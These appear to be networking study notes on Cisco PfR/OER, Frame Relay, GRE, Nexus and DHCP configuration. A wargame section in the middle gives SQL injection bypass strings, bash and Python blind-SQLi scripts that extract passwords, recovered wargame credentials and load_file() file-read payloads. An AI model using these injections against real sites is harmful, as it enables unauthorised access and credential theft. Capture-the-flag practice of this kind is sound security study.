# Rotary groups and autocommand


R2(config)# ip ssh port 2000 rotary 2 ! SSH on TCP 2000 maps to rotary group 2
R2(config)# line vty 0 1
R2(config-line)# rotary 1 ! telnet to rotary N is served on TCP 3000+N
R2(config)# line vty 2 3
R2(config-line)# rotary 2
R2(config-line)# transport input ssh
R2(config)# line vty 4 5
R2(config-line)# no login ! no local authentication on these lines: restrict them with access-class
R2(config-line)# rotary 3
R2(config-line)# autocommand ssh -l ruser 192.168.12.1 ! the session runs only this command and then closes
R2# show control-plane host open-ports ! verify which rotary ports are actually listening
R1# telnet 192.168.12.2 3001
R1# ssh -l ruser -p 2000 192.168.12.2 ! port set with ip ssh port, not 3000+N
R1# telnet 192.168.12.2 3003

# Cisco PfR/OER

Cisco Performance Routing (PfR), formerly known as Optimized Edge Routing (OER), selects routes based on destination prefix and application type.
PfR is designed to make the best use of available bandwidth, but it does not solve the problem of over-subscribed bandwidth.

Stages

- Learn
- Measure
- Apply Policy
- Enforce
- Verify

Learn

BRs learn interesting traffic classes keyed by destination prefix, optionally combined with port, DSCP, source prefix or an application identified by NBAR.
This profiling can be automatic or configured manually.

- Automatic

MC(config)# key chain key1
MC(config-keychain)# key 1
MC(config-keychain-key)# key-string cisco
MC(config)# oer master
MC(config-oer-mc)# logging
MC(config-oer-mc)# border 10.0.1.1 key-chain key1
MC(config-oer-mc-br)# interface fa0/0 internal
MC(config-oer-mc-br)# interface fa0/1 external
MC(config-oer-mc)# border 10.0.2.1 key-chain key1
MC(config-oer-mc-br)# interface fa0/0 internal
MC(config-oer-mc-br)# interface fa0/1 external
MC(config-oer-mc)# learn
MC(config-oer-mc-learn)# throughput
MC(config-oer-mc-learn)# monitor 1
MC(config-oer-mc-learn)# periodic 0

- Manual

MC(config)# ip prefix-list FILTERBRANCH1 seq 10 permit 10.1.1.0/24
MC(config)# ip prefix-list FILTERBRANCH1 seq 20 permit 10.1.2.0/24
MC(config)# ip prefix-list FILTERBRANCH2 seq 10 permit 10.2.1.0/24
MC(config)# ip prefix-list FILTERBRANCH2 seq 20 permit 10.2.2.0/24
MC(config)# ip access-list extended MYAPP
MC(config-ext-nacl)# permit tcp any any eq 21
MC(config)# oer-map MYMAP 10
MC(config-oer-map)# match traffic-class application telnet prefix-list FILTERBRANCH1
MC(config-oer-map)# set mode select-exit good
MC(config-oer-map)# set delay threshold 2000
MC(config-oer-map)# set mode route control
MC(config-oer-map)# set mode monitor both
MC(config-oer-map)# no set resolve delay
MC(config-oer-map)# set active-probe echo 10.1.1.10 ! IP SLA probe
MC(config)# oer-map MYMAP 20
MC(config-oer-map)# match traffic-class application http prefix-list FILTERBRANCH2
MC(config-oer-map)# set mode select-exit good
MC(config-oer-map)# set delay threshold 2000
MC(config-oer-map)# set mode route control
MC(config-oer-map)# set mode monitor both
MC(config-oer-map)# no set resolve delay
MC(config)# oer-map MYMAP 30
MC(config-oer-map)# match traffic-class access-list MYAPP filter FILTERBRANCH2
MC(config-oer-map)# set mode select-exit good
MC(config-oer-map)# set delay threshold 2000
MC(config-oer-map)# set mode route control
MC(config-oer-map)# set mode monitor both
MC(config-oer-map)# no set resolve delay
MC(config-oer-map)# set active-probe echo 10.1.3.10 ! IP SLA probe
MC(config)# oer master
MC(config-oer-mc)# policy-rules MYMAP
MC(config-oer-mc)# logging
MC(config-oer-mc)# border 10.1.0.1 key-chain key1
MC(config-oer-mc-br)# interface fa0/0 internal
MC(config-oer-mc-br)# interface fa0/1 external
MC(config-oer-mc)# border 10.2.0.1 key-chain key1
MC(config-oer-mc-br)# interface fa0/0 internal
MC(config-oer-mc-br)# interface fa0/1 external

Measure

Collect traffic class statistics.
The monitor modes are: passive (Netflow), active (IP SLA), both (Netflow + IP SLA), fast and special (cat6k).

Apply Policy

Determine whether traffic class is out of policy and if an alternate path can meet the policy requirements.
Traffic class states:

- Default: The prefix is configured or learned but has not yet been determined to be out of policy.
- InPolicy: The prefix meets its policy.
- Out-of-Policy: The prefix fails its policy.
- HoldDown: A waiting period that avoids erratic behaviour after a prefix has been moved to another exit.

Enforce

Re-route traffic by injecting static routes, changing BGP local preference or using PBR.
Two modes:

- Observe mode

Default mode. MC monitors traffic classes and exit links.

- Control mode

Configured using the mode route control command. MC coordinates information from BRs and changes the routing process.

Verify

Check that the new route meets the policy.
Use the logging command to log PfR state changes.
To display PfR information about prefixes or routes use:
show oer master prefix
show oer border routes ?

Laboratory

Topology:

R1-R2-R3-R5
R2-R4-R5

R2 is the MC.
R3 and R4 are the BRs.

Routing configuration:

R1(config)# interface fa0/0
R1(config-if)# ip address 192.168.12.1 255.255.255.0
R1(config)# ip route 0.0.0.0 0.0.0.0 192.168.12.2
R2(config)# interface lo2
R2(config-if)# ip address 2.2.2.2 255.255.255.255
R2(config)# interface fa0/0
R2(config-if)# ip address 192.168.23.2 255.255.255.0
R2(config)# interface fa0/1
R2(config-if)# ip address 192.168.24.2 255.255.255.0
R2(config)# interface fa1/0
R2(config-if)# ip address 192.168.12.2 255.255.255.0
R2(config)# router bgp 10
R2(config-router)# network 2.2.2.2 mask 255.255.255.255
R2(config-router)# network 192.168.12.0
R2(config-router)# network 192.168.23.0
R2(config-router)# network 192.168.24.0
R2(config-router)# neighbor 192.168.23.3 remote-as 10
R2(config-router)# neighbor 192.168.24.4 remote-as 10
R3(config)# interface lo3
R3(config-if)# ip address 3.3.3.3 255.255.255.255
R3(config)# interface fa0/0
R3(config-if)# ip address 192.168.23.3 255.255.255.0
R3(config)# interface se1/0
R3(config-if)# ip address 192.168.35.3 255.255.255.0
R3(config)# router bgp 10
R3(config-router)# network 3.3.3.3 mask 255.255.255.255
R3(config-router)# network 192.168.23.0
R3(config-router)# network 192.168.35.0
R3(config-router)# neighbor 192.168.23.2 remote-as 10
R3(config-router)# neighbor 192.168.35.5 remote-as 20
R4(config)# interface lo4
R4(config-if)# ip address 4.4.4.4 255.255.255.255
R4(config)# interface fa0/0
R4(config-if)# ip address 192.168.45.4 255.255.255.0
R4(config)# interface fa0/1
R4(config-if)# ip address 192.168.24.4 255.255.255.0
R4(config)# router bgp 10
R4(config-router)# network 4.4.4.4 mask 255.255.255.255
R4(config-router)# network 192.168.24.0
R4(config-router)# network 192.168.45.0
R4(config-router)# neighbor 192.168.24.2 remote-as 10
R4(config-router)# neighbor 192.168.45.5 remote-as 20
R5(config)# interface lo5
R5(config-if)# ip address 5.5.5.5 255.255.255.255
R5(config)# interface fa0/0
R5(config-if)# ip address 192.168.45.5 255.255.255.0
R5(config)# interface se1/0
R5(config-if)# ip address 192.168.35.5 255.255.255.0
R5(config)# router bgp 20
R5(config-router)# network 5.5.5.5 mask 255.255.255.255
R5(config-router)# network 192.168.35.0
R5(config-router)# network 192.168.45.0
R5(config-router)# neighbor 192.168.35.3 remote-as 10
R5(config-router)# neighbor 192.168.45.4 remote-as 10

OER configuration:

R3(config)# key chain MYKEY
R3(config-keychain)# key 1
R3(config-keychain-key)# key-string OER
R3(config)# oer border
R3(config-oer-br)# logging
R3(config-oer-br)# local loopback 3
R3(config-oer-br)# master 2.2.2.2 key-chain MYKEY
R4(config)# key chain MYKEY
R4(config-keychain)# key 1
R4(config-keychain-key)# key-string OER
R4(config)# oer border
R4(config-oer-br)# logging
R4(config-oer-br)# local loopback 4
R4(config-oer-br)# master 2.2.2.2 key-chain MYKEY
R2(config)# key chain MYKEY
R2(config-keychain)# key 1
R2(config-keychain-key)# key-string OER
R2(config)# oer master
R2(config-oer-mc)# policy-rules CRITICAL-APP
R2(config-oer-mc)# logging
R2(config-oer-mc)# border 3.3.3.3 key-chain MYKEY
R2(config-oer-mc-br)# interface fa0/0 internal
R2(config-oer-mc-br)# interface se1/0 external
R2(config-oer-mc)# border 4.4.4.4 key-chain MYKEY
R2(config-oer-mc-br)# interface fa0/1 internal
R2(config-oer-mc-br)# interface fa0/0 external
R2# show oer master
R2(config)# ip prefix-list CRITICAL seq 10 permit 5.5.5.5/32
R2(config)# oer-map CRITICAL-APP 10
R2(config-oer-map)# match traffic-class prefix-list CRITICAL
R2(config-oer-map)# set periodic 90 ! Try to find a better path every 90 seconds
R2(config-oer-map)# set mode select-exit best ! Try to find the best exit
R2(config-oer-map)# set backoff 90 90 ! Time to wait for an out-of-policy prefix
R2(config-oer-map)# set holddown 90
R2(config-oer-map)# set delay threshold 50 ! Maximum delay time
R2(config-oer-map)# set mode route control ! Control mode
R2(config-oer-map)# set mode monitor active
R2(config-oer-map)# set resolve delay priority 1 variance 1
R2(config-oer-map)# set active-probe echo 5.5.5.5 ! From BRs
R2# show oer master policy
R2# show oer master prefix
R2# show ip bgp 5.5.5.5/32 ! Look for localpref

Debugging and delay modification:

R3# debug oer border active-probes
R4# debug oer border active-probes
R3(config)# int s1/0
R3(config-if)# traffic-shape rate 8000 1000 0 0

References

PfR:Technology_Overview

# Flack wargame

Location

.::|[ FLACK ]|::.

Login bypass

- Level 1

' or 1=1 #
level1

or

' or '1'='1
' or '1'='1

- Level 2

' or 1=1) #
level2

or

' or '1'='1
' or '1'='1

- Level 3

admin') #
level3

- Level 4

# cat bypass-level4.sh 
#!/bin/bash
# Boolean-based blind SQLi: the page only answers 'Mail server error' when the
# injected condition is true, so every request leaks one bit about the password.

url='http://flack.hkpco.kr/login/level4/index.php'
string='Mail server error'
pass=""

# 1) find the password length by testing length(pass)=N for N = 1..50
for length in `seq 1 50`; do
 match=`curl -s -F "fuser=johnwayne' and length(pass)=$length #" $url | grep "$string"`
 if [ "$match" != "" ]; then break; fi
done
echo "Password length = $length"

# 2) recover each position by trying a-z, 0-9 and A-Z in turn (with a
#    case-insensitive MySQL collation 'a' and 'A' match the same character,
#    so the lowercase candidate is reported first)
for i in `seq 1 $length`; do
 for char in {{a..z},{0..9},{A..Z}}; do 
  match=`curl -s -F "fuser=johnwayne' and substring(pass,$i,1)='$char" $url | grep "$string"`
  if [ "$match" != "" ]; then break; fi
 done
 pass="$pass$char"
 echo "pass[$i]='$char'"
done

echo "pass='$pass'"

johnwayne
drjgxpp

- Level 5

' union select md5('level5') #
level5

Other/Blind

- Level 1

http://flack.hkpco.kr/other/level1/members.php?uid=1 or id>1 order by name
http://flack.hkpco.kr/other/level1/members.php?uid=4 order by password
http://flack.hkpco.kr/other/level1/members.php?uid=4 order by pass
http://flack.hkpco.kr/other/level1/members.php?uid=4 and length(pass)=1

# cat other-level1.sh
#!/bin/bash
# Same boolean-based blind technique as level 4, this time through the uid
# GET parameter; the row for uid=4 (containing 'jumper') is only returned
# when the appended condition is true. char(N) avoids quote characters.

url='http://flack.hkpco.kr/other/level1/members.php?uid=4'
string='jumper'
pass=""

# 1) password length
for length in `seq 1 50`; do
 match=`curl -s "$url and length(pass)=$length" | grep "$string"`
 if [ "$match" != "" ]; then break; fi
done
echo "Password length = $length"

# 2) one character per position, compared as char(<decimal ASCII code>)
for i in `seq 1 $length`; do
 for char in {{a..z},{0..9},{A..Z}}; do
  decimal=`echo -n $char | od -An -d | tr -d ' '`
  match=`curl -s "$url and substring(pass,$i,1)=char($decimal)" | grep "$string"`
  if [ "$match" != "" ]; then break; fi
 done
 pass="$pass$char"
 echo "pass[$i]='$char'"
done

echo "pass='$pass'"

jumper
mehijo123

- Level 3

http://flack.hkpco.kr/style.css

# echo -n /tmp/a000.temp | od -t x1 -An | sed 's/ /,0x/g'
# echo -n /tmp/a000.temp | od -An -t u1 | sed 's/  / /g' | tr ' ' ','

select load_file(char(0x2f,0x74,0x6d,0x70,0x2f,0x61,0x30,0x30,0x30,0x2e,0x74,0x65,0x6d,0x70));

or

select load_file(char(47,116,109,112,47,97,48,48,48,46,116,101,109,112));

batman
skoda>batmobile
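The two shell scripts above try one candidate character per request and compare substrings directly, which a case-insensitive MySQL collation can turn into a wrong-case result. The Python below is an added example (not part of the wargame write-up) that extracts the same kind of secret with a binary search over ASCII codes via ascii(substring(...)), and also shows the char() encoding used for the Level 3 load_file() path. The target is replaced by a constructed local oracle() that models `uid=4 and <condition>` followed by the grep; SECRET, STATS, find_length, find_char and extract are names chosen for this example.

```python
import re

# Constructed secret that the local stand-in oracle "protects"; in the
# wargame the real value sits in the target's members table.
SECRET = "mehijo123"
STATS = {"queries": 0}


def to_mysql_char(s: str) -> str:
    """Encode a string as MySQL char(...) so the payload needs no quote
    characters (the trick used above for the load_file() path)."""
    return "char(" + ",".join(str(b) for b in s.encode()) + ")"


def oracle(condition: str) -> bool:
    """Stand-in for 'GET members.php?uid=4 and <condition>' followed by a
    grep for the string that only appears when the row is returned. It
    evaluates the two condition shapes the extractor uses. Replace the body
    with an HTTP request to test a target you are authorised to assess."""
    STATS["queries"] += 1
    m = re.fullmatch(r"length\(pass\)>(\d+)", condition)
    if m:
        return len(SECRET) > int(m.group(1))
    m = re.fullmatch(r"ascii\(substring\(pass,(\d+),1\)\)>(\d+)", condition)
    if m:
        pos, n = int(m.group(1)), int(m.group(2))
        if not 1 <= pos <= len(SECRET):
            return False  # MySQL: ascii('') is 0, never greater than a printable code
        return ord(SECRET[pos - 1]) > n
    raise ValueError(f"unsupported condition: {condition}")


def find_length(max_len: int = 64) -> int:
    """Binary search on length(pass)>N: about log2(max_len) requests instead
    of one request per candidate length."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length(pass)>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def find_char(pos: int, lo: int = 32, hi: int = 126) -> str:
    """Binary search the ASCII code of one character over the printable range.
    Comparing ascii(substring(...)) instead of the character itself sidesteps
    the case-insensitive default collation, under which 'a' = 'A' makes a
    plain character comparison report the wrong case."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"ascii(substring(pass,{pos},1))>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract() -> str:
    """Recover the whole secret; STATS['queries'] counts requests issued."""
    STATS["queries"] = 0
    length = find_length()
    return "".join(find_char(i) for i in range(1, length + 1))


if __name__ == "__main__":
    secret = extract()
    print(f"pass='{secret}' recovered in {STATS['queries']} queries")
    print(to_mysql_char("/tmp/a000.temp"))
```

Against the constructed oracle the nine-character secret comes back in fewer than 80 requests, against up to 62 per position for the linear scan in the shell scripts; the only change needed for a real target is the body of oracle().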

# IP Forwarding

Process Switching, Fast Switching, and Cisco Express Forwarding

With fast switching, the first packet to a destination is process switched and the router adds an entry to the fast-switching cache (route cache) holding the destination IP address, next-hop information and the data-link header. Later packets to the same destination match the cache entry. Cache entries time out quickly.
CEF optimizes the route lookup with the Forwarding Information Base (FIB) and the adjacency table. The FIB holds the known routes from the RIB and points to entries in the adjacency table, which lists the outgoing interface and the data-link information. Both are precomputed, so no packet has to be process switched first; on hardware-switching platforms they are stored in Ternary Content Addressable Memory (TCAM).

Frame Relay Inverse ARP

With InARP, routers know the DLCI and need to learn the IP address.
A Frame Relay multipoint subinterface uses received InARP information.

Router1(config)# interface s0/0
Router1(config-if)# encapsulation frame-relay
Router1(config)# interface s0/0.1 multipoint
Router1(config-if)# ip address 192.168.0.1 255.255.255.0
Router1(config-if)# frame-relay interface-dlci 200
Router1(config-if)# frame-relay interface-dlci 300
Router1# show frame-relay map

A Frame Relay point-to-point subinterface ignores InARP information because any other IP hosts can be reached only by the single DLCI.

Router2(config)# interface s0/0
Router2(config-if)# encapsulation frame-relay
Router2(config)# interface Serial0/0.2 point-to-point
Router2(config-if)# ip address 192.168.0.2 255.255.255.0
Router2(config-if)# frame-relay interface-dlci 100

InARP messages only flow across a VC, so a router never learns a mapping for a peer it has no VC to (for example another spoke behind the same hub). The solution is a static frame-relay map entry for the router that is not directly connected.

Router3(config)# interface s0/0
Router3(config-if)# encapsulation frame-relay
Router3(config-if)# ip address 192.168.0.3 255.255.255.0
Router3(config-if)# frame-relay interface-dlci 100
Router3(config-if)# frame-relay map ip 192.168.0.2 100 broadcast

Disabling InARP

InARP can be disabled on multipoint interfaces and physical interfaces using no frame-relay inverse-arp.
The router stops sending InARP messages and ignores received InARP messages too.

Classless and Classful Routing

Classless routing: when a default route exists and no specific match is made, the default route is used.
Classful routing: when a default route exists and the class A, B or C network does not exist in the routing table, the default route is used. If a class A, B or C network exists, but the packet does not match any of the existing subnets of that classful network, the default route is not used and the packet is discarded.
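As an added example (not from the page), the following Python performs a longest-prefix match over a constructed RIB and then applies the classful rule described above, so the difference between the two behaviours can be checked on concrete addresses. The RIB contents, the interface names and the function names lookup and classful_network are chosen for this example.

```python
import ipaddress

# Constructed RIB: one subnet of the class A network 10.0.0.0/8, an unrelated
# class B network and a default route. Values are outgoing interface labels
# made up for the example.
RIB = {
    ipaddress.ip_network("10.1.1.0/24"): "Serial0/0",
    ipaddress.ip_network("172.16.0.0/16"): "Serial0/1",
    ipaddress.ip_network("0.0.0.0/0"): "FastEthernet0/0",  # default route
}


def classful_network(addr):
    """Return the class A/B/C network an address belongs to (/8, /16, /24),
    or None for class D/E addresses."""
    first = int(addr) >> 24
    if first < 128:
        plen = 8
    elif first < 192:
        plen = 16
    elif first < 224:
        plen = 24
    else:
        return None
    return ipaddress.ip_network((str(addr), plen), strict=False)


def lookup(rib, dst, classful=False):
    """Longest-prefix match for dst. With classful=True apply the
    'no ip classless' rule: if the RIB holds subnets of dst's classful
    network but none of them matches, the default route is ignored and
    the packet is discarded (None)."""
    dst = ipaddress.ip_address(dst)
    matches = [net for net in rib if dst in net]
    if not matches:
        return None
    best = max(matches, key=lambda net: net.prefixlen)
    if classful and best.prefixlen == 0:
        major = classful_network(dst)
        if major is not None and any(
            net.prefixlen > 0 and net.subnet_of(major) for net in rib
        ):
            return None  # known classful network, unknown subnet: dropped
    return rib[best]


if __name__ == "__main__":
    for target in ("10.1.1.9", "10.1.2.5", "192.0.2.1"):
        print(target, "classless:", lookup(RIB, target),
              "classful:", lookup(RIB, target, classful=True))
```

The case to remember is 10.1.2.5: classless forwarding sends it out the default route, classful forwarding silently drops it because the router knows a subnet of 10.0.0.0/8 but not the one the packet wants.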

Policy Routing

set ip next-hop 10.1.1.1 10.1.1.2: Forwards to the first address in the list whose associated interface is up.
set ip default next-hop 10.1.1.1 10.1.1.2: Same logic, except policy routing first attempts to route based on the routing table.
set interface s0/0 s1/0: Forwards packets using the first interface in the list that is up.
set default interface s0/0 s1/0: Same logic, except policy routing first attempts to route based on the routing table.
ToS byte (8 bits): bits 7-5 IP precedence, bit 4 Delay, bit 3 Throughput, bit 2 Reliability, bit 1 Monetary cost, bit 0 must be 0.
set ip precedence number|name: Sets bits 7-5 of the ToS byte.
set ip tos number: Sets the four ToS bits (bits 4-1), value 0-15.

Router(config)# access-list 100 permit tcp any any eq 22
Router(config)# route-map MYROUTEMAP permit 10
Router(config-route-map)# match ip address 100
Router(config-route-map)# set ip next-hop 10.1.1.1
Router(config)# route-map MYROUTEMAP permit 20
Router(config-route-map)# set ip next-hop 10.1.1.2

Optimized Edge Routing and Performance Routing

OER came first; Cisco extended it and renamed it PfR. PIRO (Protocol Independent Route Optimization) is the PfR feature that looks up the parent route in the RIB so that traffic can be controlled regardless of the routing protocol in use.
OER was created to route traffic better than a plain routing protocol does, taking into account:

- Packet loss
- Response time
- Path availability
- Traffic load distribution

PfR learns about network performance using IP SLA (active monitoring) and/or Netflow (passive monitoring).
Stages:

- Learn
- Measure
- Apply Policy
- Enforce
- Verify

Requirements:

- CEF enabled
- IGP/BGP working
- Does not support MPLS and iBGP
- Uses redistribution of static routes with a tag

Device Roles in PfR

- Master Controller (MC)

Configured using the oer master command.
Learns specified information from the BRs and makes configuration decisions.

- Border Router (BR)

Configured using the oer border command.
A single router can act as both MC and BR.

MC High Availability and Failure Considerations

BR and MC maintain communication using keepalives. If keepalives from the MC stop, the BR removes any PfR information.
For high availability configure more than one MC.

PfR configuration

MC(config)# key chain key1
MC(config-keychain)# key 1
MC(config-keychain-key)# key-string pfr
MC(config)# oer master
MC(config-oer-mc)# logging
MC(config-oer-mc)# mode route control
MC(config-oer-mc)# max prefix total 1000
MC(config-oer-mc)# backoff 90 3000 300
MC(config-oer-mc)# learn
MC(config-oer-mc-learn)# delay
MC(config-oer-mc-learn)# monitor period 5
MC(config-oer-mc-learn)# periodic interval 15
MC(config-oer-mc)# border 10.1.0.1 key-chain key1
MC(config-oer-mc-br)# interface fa0/0 internal
MC(config-oer-mc-br)# interface se0/0 external
MC(config-oer-mc-br-if)# max-xmit-utilization absolute 1500
MC(config-oer-mc-br-if)# cost-minimization fixed fee 1000
MC(config-oer-mc)# border 10.2.0.1 key-chain key1
MC(config-oer-mc-br)# interface fa0/0 internal
MC(config-oer-mc-br)# interface se0/0 external
MC(config-oer-mc-br-if)# max-xmit-utilization absolute 1000
MC(config-oer-mc-br-if)# cost-minimization fixed fee 800
BR1(config)# key chain key1
BR1(config-keychain)# key 1
BR1(config-keychain-key)# key-string pfr
BR1(config)# oer border
BR1(config-oer-br)# master 10.0.0.1 key-chain key1
BR1(config-oer-br)# local fa0/0
BR1(config-oer-br)# active-probe address source interface fa0/0
BR2(config)# key chain key1
BR2(config-keychain)# key 1
BR2(config-keychain-key)# key-string pfr
BR2(config)# oer border
BR2(config-oer-br)# master 10.0.0.1 key-chain key1
BR2(config-oer-br)# local fa0/0
BR2(config-oer-br)# active-probe address source interface fa0/0

GRE Tunnels

The passenger protocol is encapsulated inside the transport protocol. Multicast carried between two routers in unicast packets is a typical example.
GRE adds no confidentiality or authentication, so run it inside IPsec when the transport network is not trusted.

R1(config)# int tu0
R1(config-if)# ip address 10.1.3.1 255.255.255.0
R1(config-if)# tunnel source FastEthernet0/0
R1(config-if)# tunnel destination 192.168.23.3
R1(config-if)# tunnel mode gre ip ! default mode
R1(config)# int fa0/0
R1(config-if)# ip address 192.168.12.1 255.255.255.0
R1(config)# ip route 0.0.0.0 0.0.0.0 192.168.12.2
R3(config)# int tu0
R3(config-if)# ip address 10.1.3.3 255.255.255.0
R3(config-if)# tunnel source FastEthernet0/0
R3(config-if)# tunnel destination 192.168.12.1
R3(config-if)# tunnel mode gre ip ! default mode
R3(config)# int fa0/0
R3(config-if)# ip address 192.168.23.3 255.255.255.0
R3(config)# ip route 0.0.0.0 0.0.0.0 192.168.23.2

# Cisco Nexus

Some Commands

- Hardware

NX-7K-1# show inventory ! display chassis components
NX-7K-1# show redundancy status ! determine active supervisor
NX-7K-1# show module ! display individual modules
NX-7K-1# show environment ! display clock, fan, temperature, power
NX-7K-1(config)# power redundancy-mode ?

- System utilization

NX-7K-1# show system resources

- Piping

NX-7K-1# show run | ? ! last, tail, egrep, no-more, ...

- Running config

NX-7K-1# show running-config ?
NX-7K-1# show running-config all ! display configuration with defaults

- Interface ranges

NX-7K-1(config)# int e2/4, e3/1-2 ! no range command

- Shared or dedicated

NX-7K-1(config)# int e2/1, e2/3, e2/5, e2/7
NX-7K-1(config-if)# shutdown
NX-7K-1(config)# int e2/1
NX-7K-1(config-if)# rate-mode dedicated
NX-7K-1(config-if)# no shutdown

- Licensing

NX-7K-1# show license host-id
NX-7K-1# install license bootflash: NX7K-1234.lic
NX-7K-1# show license usage

- Modules

NX-7K-1# reload module ?
NX-7K-1# attach module ?

Virtual Device Context (VDC)

Four VDCs: Default VDC1 and 3 additional VDCs.

NX-7K-1(config)# vdc VDC2 id 2
NX-7K-1(config-vdc)# allocate interface e3/1-24
NX-7K-1(config)# vdc VDC3 id 3
NX-7K-1(config-vdc)# allocate interface e3/25-48
NX-7K-1# show vdc
NX-7K-1# show vdc membership
NX-7K-1# show run vdc
NX-7K-1# switchto vdc VDC2
NX-7K-1-VDC2# switchback
NX-7K-1#

Virtual Port Channel (VPC)

NX-7K-1(config)# feature vpc
NX-7K-1(config)# vpc domain 10
NX-7K-1(config-domain)# peer-switch
NX-7K-1(config-domain)# peer-keepalive destination 10.10.10.2
NX-7K-1# show vpc role
NX-7K-1# show vpc peer-keepalive
NX-7K-1(config)# interface port-channel 10
NX-7K-1(config-if)# switchport mode trunk
NX-7K-1(config-if)# switchport trunk allowed vlan 100-105 ! vPC VLANs
NX-7K-1(config-if)# switchport trunk native vlan 100
NX-7K-1(config-if)# vpc peer-link
NX-7K-1# show vpc brief
NX-7K-1(config)# interface ethernet 1/1-2
NX-7K-1(config-if-range)# channel-group 11 mode active
NX-7K-1(config)# interface port-channel 11
NX-7K-1(config-if)# switchport mode trunk
NX-7K-1(config-if)# vpc 11
NX-7K-2(config)# feature vpc
NX-7K-2(config)# vpc domain 10
NX-7K-2(config-domain)# peer-switch
NX-7K-2(config-domain)# peer-keepalive destination 10.10.10.1
NX-7K-2(config)# interface port-channel 10
NX-7K-2(config-if)# switchport mode trunk
NX-7K-2(config-if)# switchport trunk allowed vlan 100-105 ! vPC VLANs
NX-7K-2(config-if)# switchport trunk native vlan 100
NX-7K-2(config-if)# vpc peer-link
NX-7K-2(config)# interface ethernet 2/7-8
NX-7K-2(config-if-range)# channel-group 11 mode active
NX-7K-2(config)# interface port-channel 11
NX-7K-2(config-if)# switchport mode trunk
NX-7K-2(config-if)# vpc 11
NX-7K-2# show vpc consistency-parameters global

Fabric EXtenders (FEX) ~ Nexus 2000 series

Deployment models:

- Static pinning (Nexus 5000 series)

NX-5K-1(config)# feature fex
NX-5K-1(config)# fex 100
NX-5K-1(config-fex)# pinning max-links 4
NX-5K-1(config)# int ethernet 1/1-4
NX-5K-1(config-if)# switchport mode fex-fabric
NX-5K-1(config-if)# fex associate 100
NX-5K-1# show fex 100
NX-5K-1# show fex detail
NX-5K-1# show module fex

- Dynamic pinning (Nexus 5000 and 7000 series)

NX-5K-1(config)# feature fex
NX-5K-1(config)# fex 101
NX-5K-1(config-fex)# pinning max-links 1
NX-5K-1(config)# int ethernet 1/9-12
NX-5K-1(config-if)# switchport mode fex-fabric
NX-5K-1(config-if)# channel-group 11
NX-5K-1(config)# int port-channel 11
NX-5K-1(config-if)# fex associate 101
NX-5K-1# show int port-channel 11 fex-intf
NX-5K-1# show module fex

- vPC (Nexus 5000 series)

NX-5K-1(config)# feature fex
NX-5K-1(config)# fex 102
NX-5K-1(config-fex)# pinning max-links 1
NX-5K-1(config)# int ethernet 1/17-20
NX-5K-1(config-if)# switchport mode fex-fabric
NX-5K-1(config-if)# channel-group 12
NX-5K-1(config)# feature vpc
! vPC domain configuration
NX-5K-1(config)# int port-channel 12
NX-5K-1(config-if)# vpc 12
NX-5K-1(config-if)# fex associate 102
NX-5K-1# show int port-channel 12 fex-intf
NX-5K-1# show module fex

Configuration Rollback

NX-7K-1# checkpoint CP1 description First checkpoint
NX-7K-1# show checkpoint summary
NX-7K-1# rollback running-config checkpoint CP1

Role-Based Access Control (RBAC)

NX-7K-1(config)# role name L3-admin
NX-7K-1(config-role)# rule 1 permit read-write feature-group L3
NX-7K-1(config-role)# vlan policy deny
NX-7K-1(config-role-vlan)# permit vlan 1-100
NX-7K-1(config-role)# vrf policy deny
NX-7K-1(config-role-vrf)# permit vrf VRF1
NX-7K-1(config-role-vrf)# permit vrf VRF2
NX-7K-1# show role

Ethanalyzer ~ a wrapper over tshark

NX-7K-1# ethanalyzer local interface inband brief limit-captured-frames 10
NX-7K-1# ethanalyzer local interface inband limit-captured-frames 1

VRF

NX-7K-1# show ip int brief ! default VRF
NX-7K-1# show ip int brief vrf management
NX-7K-1# ping 10.1.1.1 vrf management
NX-7K-1# routing-context vrf management
NX-7K-1%management# ping 10.1.1.1
NX-7K-1%management# routing-context vrf default
NX-7K-1#

Config-sync

NX-7K-1# configure sync
NX-7K-1(config-sync)# switch-profile PROFILE1
NX-7K-2# configure sync
NX-7K-2(config-sync)# switch-profile PROFILE1
NX-7K-2(config-sync-sp)# import interface po10
NX-7K-2(config-sync-sp-import)# verify
NX-7K-2(config-sync-sp-import)# show switch-profile PROFILE1 buffer
NX-7K-2(config-sync-sp-import)# show switch-profile PROFILE1 status
NX-7K-2(config-sync-sp-import)# commit
NX-7K-1(config-sync-sp)# sync-peers destination 10.0.0.2
NX-7K-2(config-sync-sp)# sync-peers destination 10.0.0.1
NX-7K-2(config-sync-sp)# int po10
NX-7K-2(config-sync-sp-if)# spanning-tree port type edge trunk
NX-7K-2(config-sync-sp)# verify
NX-7K-2(config-sync-sp)# commit
NX-7K-2# show running-config switch-profile

In-Service Software Upgrade (ISSU)

NX-7K-2# show incompatibility system n7000.bin
NX-7K-2# install all kickstart n7000-kickstart.bin system n7000.bin
NX-7K-2# system switchover
NX-7K-1# show incompatibility system n7000.bin
NX-7K-1# install all kickstart n7000-kickstart.bin system n7000.bin
NX-7K-1# system switchover

# IP Services

RARP, BOOTP, and DHCP

- ARP

Ether.src = source MAC
Ether.dst = ff:ff:ff:ff:ff:ff
Ether.type = 0x0806
Sender MAC address = source MAC
Sender IP address = source IP
Target MAC address = 00:00:00:00:00:00
Target IP address = destination IP

- RARP

Ether.src = source MAC
Ether.dst = ff:ff:ff:ff:ff:ff
Ether.type = 0x0806
Sender MAC address = source MAC
Sender IP address = 0.0.0.0
Target MAC address = source MAC
Target IP address = 0.0.0.0

Request to find its own IP address.
A preconfigured RARP server is needed.

- BOOTP

Improves assignment features of RARP.
Uses UDP, so a router can relay BOOTP request to a centrally located BOOTP server.
A preconfigured BOOTP server is needed.
Supports the assignment of IP address, subnet mask, default gateway, DNS and IP address of a boot/image server.

DHCP

Builds on the BOOTP message format and dynamically assigns a variety of information without requiring a predefined MAC address for each client.
A router relaying a DHCP request (ip helper-address) puts its own IP address in the gateway IP address (giaddr) field.

Router(config)# service dhcp
Router(config)# ip dhcp excluded-address 10.1.1.1 10.1.1.20
Router(config)# ip dhcp pool MYPOOL
Router(config-dhcp)# network 10.1.1.0 255.255.255.0
Router(config-dhcp)# domain-name lab.net
Router(config-dhcp)# dns-server 10.1.2.200
Router(config-dhcp)# default-router 10.1.1.1
Router(config-dhcp)# lease 0 0 20 ! days hours minutes


